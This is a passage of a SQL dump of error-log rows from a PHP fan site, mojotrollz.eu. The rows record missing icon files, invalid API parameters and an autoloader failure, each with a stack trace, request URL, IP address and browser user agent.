/home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 5100, \'tree\', \'\\\\SYSTEEM\\\\API\\\\vvver.)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.016, '2014-11-03 22:18:17', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree&action=tree&tree=undefined', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (99, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'warriorDefense.jpg\' found.', 'ec96445038c21e6a05209cd6603d0659d120dae0', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_tree\', \'warriorDefense....\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_tree\', \'warriorDefense....\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.008, '2014-11-03 23:08:09', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_tree&id=warriorDefense.jpg', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (100, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 3; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=1', 'fd98af8b57c61696c98067e1053cdac2fd1107ef', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.012, '2014-11-04 01:11:49', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=1', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (101, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'0.png\' found.', '11f66a0115a1bab414abb6cab13c6c7df7c3363a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'0.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'0.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.008, '2014-11-20 20:31:52', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=0.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 38, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (102, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'5.png\' found.', 'f900b13bd44763c06ccdb08062bb9049bfdc1d90', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'5.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'5.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.012, '2014-11-04 11:18:51', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=5.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 9, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (103, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'shaman.png\' found.', 'fcd459081f36a5765b9ca28faf9458e555d5e465', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'shaman.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'shaman.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.004, '2014-11-04 11:17:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=shaman.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (104, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'priest.png\' found.', '63e4656b564fc19018648369b1f69d0e5ebfbb9e', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'priest.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'priest.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.012, '2014-11-04 11:17:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=priest.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (105, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'warrior.png\' found.', '4eb21916294efd94c10e874055151f6f4ac4fa69', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'warrior.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'warrior.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.016, '2014-11-04 11:17:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=warrior.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (106, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'rogue.png\' found.', '8e8a4ff8a178491221c334b7d711881b0c77d691', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'rogue.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'rogue.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.016, '2014-11-04 11:17:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=rogue.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (107, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'mage.png\' found.', '5cd8d5839f3e95736d4bd603b5a1ff9eb9d7f17f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'mage.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'mage.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.02, '2014-11-04 11:17:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=mage.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (108, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'druid.png\' found.', '780ddb7cd578d8f9975d7898ed3b4aa51b6bac79', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'druid.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'druid.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.008, '2014-11-04 11:17:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=druid.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (109, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'paladin.png\' found.', '2b5a25861cde2b51e0ee3a6af978dc6f7964e0a8', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'paladin.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'paladin.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.012, '2014-11-04 11:17:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=paladin.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (110, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'hunter.png\' found.', '80c774daa2a90359c3b02a83becf3d99da98563f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'hunter.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'hunter.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.012, '2014-11-04 11:17:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=hunter.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (111, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'warlock.png\' found.', 'd0696835002e7df7b60cbcb942d08a742e17977d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'warlock.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'warlock.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.004, '2014-11-04 11:17:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=warlock.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (112, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'class\' found.', 'f82eed4aa2dec4cee277ee8cd06db44ba3cbd547', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 15, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'class\', \'rogue.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'class\', \'rogue.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.008, '2014-11-04 11:18:30', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=class&id=rogue.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 19, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (113, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'class not valid.png\' found.', '455b0f3e9491f7f29b21433df9ddf48fe8077d7e', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'class\', \'class not valid...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'class\', \'class not valid...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.004, '2014-11-04 13:33:51', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=class&id=class%20not%20valid.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (114, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 3; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=2', '42c5b5ffd5f8fb0b08e13fc438d911651cd17159', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.197', 0.012, '2014-12-11 01:54:26', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=2', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (248, 'SYSTEM\\LOG\\ERROR', 'Class not found: saimod_mojotrollz_skilltree', 'eb6a4c6387c86185d3da634581f72eeea50f19a7', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'saimod_mojotrol...\')\n#1 [internal function]: spl_autoload_call(\'saimod_mojotrol...\')\n#2 /home/web/webdir/mojotrollz/system/sai/sai/sai.php(11): class_exists(\'saimod_mojotrol...\')\n#3 /home/web/webdir/mojotrollz/system/sai/sai/sai.php(22): SYSTEM\\SAI\\sai::check_module(\'saimod_mojotrol...\')\n#4 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_skilltree/autoload.inc.php(4): SYSTEM\\SAI\\sai::register(\'saimod_mojotrol...\')\n#5 /home/web/webdir/mojotrollz/mojotrollz/sai/register_modules.php(4): require_once(\'/home/web/webdi...\')\n#6 /home/web/webdir/mojotrollz/sai.php(14): require_once(\'/home/web/webdi...\')\n#7 {main}', '37.24.148.240', 0.024, '2014-11-25 11:10:38', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?t=11_0000000000000000_5500511303222151_000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (240, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'nightelf_default.png\' found.', '61a3e2945ec597f1c91e8977c54a94a6b00d3e96', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'race\', \'nightelf_defaul...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'race\', \'nightelf_defaul...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.056, '2014-11-20 22:57:53', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=race&id=nightelf_default.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/?t=11_5110111010000000_5002500303222150_550000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (115, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'human_male.png\' found.', '685c38201efe77443496b028c238ac4539b65209', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_page\', \'human_male.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_page\', \'human_male.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.245.215', 0.064, '2014-11-10 02:01:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_page&id=human_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 8, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (116, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'orc_male.png\' found.', '762f205565785c33c88f4af75f14693d1a8d0a38', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_page\', \'orc_male.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_page\', \'orc_male.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.245.215', 0.104, '2014-11-19 02:15:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_page&id=orc_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 459, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, 